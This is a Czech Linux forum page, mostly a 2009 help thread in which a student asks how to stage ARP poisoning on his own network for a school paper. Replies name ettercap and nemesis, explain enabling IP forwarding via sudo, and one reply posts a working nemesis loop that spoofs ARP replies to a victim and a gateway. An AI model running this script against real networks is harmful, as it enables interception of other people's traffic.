Přihlášení | Registrace

napište » Zprávičky

LibrePCB 1.0.0

včera 20:44 | Nová verze

LibrePCB, tj. svobodný multiplatformní softwarový nástroj pro návrh desek plošných spojů (PCB), dospěl po pěti letech vývoje do verze 1.0.0. Přehled novinek v příspěvku na blogu a v aktualizované dokumentaci. Zdrojové kódy jsou k dispozici na GitHubu pod licencí GPLv3.

Ladislav Hagara | Komentářů: 0

Facebook má nové logo

23.9. 16:55 | IT novinky

Facebook má nové logo. Poznáte rozdíl?

Ladislav Hagara | Komentářů: 6

Sweet Home 3D 7.2 a Sweet Home 3D Mobile

23.9. 15:55 | Nová verze

Byla vydána nová verze 7.2 v Javě napsané aplikace pro komplexní návrh rozmístění nábytku a dalšího vybavení v interiérech Sweet Home 3D. Vyzkoušet lze online verzi. Před dvěma týdny vyšla placená verze pro chytré telefony a tablety (App Store, Google Play).

Ladislav Hagara | Komentářů: 4

Maker Faire Mladá Boleslav

22.9. 14:11 | Pozvánky

Zítra 23. září proběhne Maker Faire Mladá Boleslav, festival plný workshopů, interaktivních činností a především nadšených a zvídavých lidí.

Ladislav Hagara | Komentářů: 0

Ubuntu 23.10 (Mantic Minotaur) Beta

22.9. 13:33 | Nová verze

Byla vydána beta verze Ubuntu 23.10 s kódovým názvem Mantic Minotaur. Přehled novinek v poznámkách k vydání. Dle plánu by Ubuntu 23.10 mělo vyjít 12. října 2023.

Ladislav Hagara | Komentářů: 10

Nové verze firmwarů pro 3D tiskárny Original Prusa

22.9. 11:22 | Zajímavý článek

Josef Průša informuje o nových verzích firmwarů pro tiskárny Original Prusa, 5.0.0 pro MK4 a MK3.9 a 5.1.0-alpha1 pro MINI, díky kterým jsou tiskárny mnohem rychlejší.

Ladislav Hagara | Komentářů: 0

Mastodon 4.2

22.9. 09:11 | Nová verze

Mastodon (Wikipedie), svobodná federalizovaná sociální síť, byl vydán ve verzi 4.2. Z novinek je vypíchnuto vylepšené vyhledávání.

Ladislav Hagara | Komentářů: 8

Analýza bezpečnostní chyby CVE-2023-4863 v knihovně WebP / libwebp

22.9. 08:55 | Zajímavý článek

Ben Hawkes publikoval pod názvem The WebP 0day analýzu bezpečnostní chyby CVE-2023-4863 v knihovně WebP / libwebp s řadou zajímavých odkazů. Pravděpodobně se jedná o stejnou chybu jako BLASTPASS (CVE-2023-41064 a CVE-2023-41061) v macOS, iOS, iPadOS a watchOS. Zpracování (zobrazení) speciálně připraveného obrázku nebo přílohy vedlo ke spuštění útočníkem připraveného kódu.

Ladislav Hagara | Komentářů: 0

Myš je pro kočku: Prohlížeče

22.9. 08:11 | Zajímavý článek

Myš je pro kočku: Prohlížeče je dalším dílem ze série článků Myš je pro kočku, kde Edvard Rejthar ukazuje, jak lze počítač ovládat bez myši. Používáte ve webových prohlížečích zkratky Ctrl+(Shift)+Tab, Ctrl+(Shift)+PgDn/PgUp, F6, (Shift)+Alt+Enter nebo F7?

Ladislav Hagara | Komentářů: 10

Mobilní Datovka Beta

21.9. 14:33 | Nová verze

Vývojáři mobilní Datovky prosí o pomoc s testováním beta verze mobilní Datovky s novým grafickým rozhraním, podporou pro tmavý režim a podporou pro VoDZ. Aplikace je zatím dostupná pouze pro zařízení Android a je umístěna v samostatném instalačním kanále Datovka Beta. Tento kanál slouží pro testovaní nové funkcionality a grafického uživatelského rozhraní. Datovka Beta se instaluje jako samostatná aplikace s vlastními daty, která

… více »

Ladislav Hagara | Komentářů: 0

Centrum | Napsat | Starší

navrhněte » Anketa

Knihy s linuxovou tematikou

čtu, a to „od začátku do konce“ (19%)

používám jako referenční příručky (15%)

mám, ale (už) nečtu (50%)

nemám (27%)

Celkem 274 hlasů

Komentářů: 11, poslední 17.9. 19:19

Rozcestník

AbcLinuxu

HDmag.cz

AbcLinuxu:/ Poradna / Linuxová poradna / Arp poisoning

Štítky: není přiřazen žádný štítek

Dotaz: Arp poisoning

29.10.2009 14:57 Marek Adamovsky
Arp poisoning

Přečteno: 748×

Odpovědět | Admin

Dobry den, rad bych na sve siti provedl ARP poisoning, abych mohl tento utok analyzovat a popsat jako praci do skoly. Muzete mi prosim poradit jakou aplikaci na ARP poisoning pouzit?

Nástroje: Začni sledovat (2) ?

Odpovědi

29.10.2009 15:21 Cubic | skóre: 24 | blog: obcasne_vyplody | Essex
Rozbalit Rozbalit vše Re: Arp poisoning

google nic? zacit muzes s ettercap

Do you like what you see? No? Well, bloody look harder.

29.10.2009 16:49 Marek Adamovsky
Rozbalit Rozbalit vše Re: Arp poisoning

Dekuji, prave to zkousim. Podle tohoto navodu: http://openmaniak.com/ettercap_arp.php Data zachytavam Wiresharkem, jenze mi to funguje tak na pul. "Otraveny" host posle pozadavek (treba na nacteni stranky) na router, ja ho ale u sebe nevidim. Vidim pouze odpoved, ktera prijde.

Je to jako kdyby host nebyl otraveny a posilal data spravne na router a router byl otraveny a posilal data ke mne. Je neco takoveho mozne? V cem muze byt chyba?

A jeste bych se chtel zeptat, jestli je toto ok:

$ cat /proc/sys/net/ipv4/ip_forward
0

29.10.2009 17:22 Cubic | skóre: 24 | blog: obcasne_vyplody | Essex
Rozbalit Rozbalit vše Re: Arp poisoning

nevim, jen jsem si vzpomnel ze to je v ettercapu mozne ale predpokladam ze

echo 1 > /proc/sys/net/ipv4/ip_forward
potreba bude

Do you like what you see? No? Well, bloody look harder.

29.10.2009 17:33 Marek Adamovsky
Rozbalit Rozbalit vše Re: Arp poisoning

A nevite proc nejde toto:

$ sudo echo 1 > /proc/sys/net/ipv4/ip_forward
bash: /proc/sys/net/ipv4/ip_forward: Permission denied

Pokud se ale prepnu na roota pres su tak to jde, ale ja bych to rad umistil do skriptu.

29.10.2009 17:51 Bilbo | skóre: 29
Rozbalit Rozbalit vše Re: Arp poisoning

Protoze to provede prikaz "echo 1" pod rootem a jeho vystup (uz pod normalnim uzivatelem) presmeruje do /proc/sys/net/ipv4/ip_forward

Musi se to ouvozovkovat:

sudo 'echo 1 > /proc/sys/net/ipv4/ip_forward'

pak se to spusti spravne cele jako prikaz pod rootem

Big brother is not watching you anymore. Big Brother is telling you how to live...

8.11.2009 09:32 Marek Adamovsky
Rozbalit Rozbalit vše Re: Arp poisoning

Stale nic:

$ sudo 'echo 1 > /proc/sys/net/ipv4/ip_forward'
sudo: echo 1 > /proc/sys/net/ipv4/ip_forward: command not found

8.11.2009 11:30 l4m4
Rozbalit Rozbalit vše Re: Arp poisoning

sudo takhle nefunguje (tj. nenechává napsané interpretovat shellem), protože by to citelně zkomplikovalo omezení, když má uživatel povoleno spouštět jen určité věci. sudo prostě napsané exec-ne.

a) spouštěj to v rootovském shellu

b) dej to do skriptu, ten pak můžeš spouštět přes sudo

8.11.2009 15:20 Bilbo | skóre: 29
Rozbalit Rozbalit vše Re: Arp poisoning

No, pokud je sudo "neomezene" (osobne sudo nepouzivam, jen su, takze ho moc neznam, ale tusim nejak takhle je nastaveno treba ve vychozi konfiguraci Ubuntu), tak i s tim shellem by to slo, asi by se muselo pouzit neco jako:

sudo sh -c 'echo 1 > /proc/sys/net/ipv4/ip_forward'

nebo

sudo "sh -c 'echo 1 > /proc/sys/net/ipv4/ip_forward'"

Nebo ten skript :)

Big brother is not watching you anymore. Big Brother is telling you how to live...

29.10.2009 16:17 NN
Rozbalit Rozbalit vše Re: Arp poisoning

nemesis (odzkouseno :D )

29.10.2009 19:40 faha
Rozbalit Rozbalit vše Re: Arp poisoning

Zdravim, je to vcelku "trivialni" utok a take je pomerne dobre popsany, hezky je to popsane v knize Linux hackerské útoky.

Jeden z pouzivanych nastroju je nemesis, najdete ho alespon v debianu primo v repositari.

nemesis - TCP/IP Packet Injection Suite

Jeste prikladam skriptik jak to udelat...

----

#!/bin/sh

SOURCEMAC=""
SOURCEIP=""

DESTMAC=""
DESTIP=""

MYMAC=""
MYIP=""

while true
do
# 1
/usr/bin/nemesis arp -v -r -d eth0 -S $DESTIP -D $SOURCEIP -h $MYMAC -m $SOURCEMAC -H $MYMAC -M $SOURCEMAC

# 2
/usr/bin/nemesis arp -v -r -d eth0 -S $SOURCEIP -D $DESTIP -h $MYMAC -m $DESTMAC -H $MYMAC -M $DESTMAC
echo "Injecting ... "
sleep 10
done
----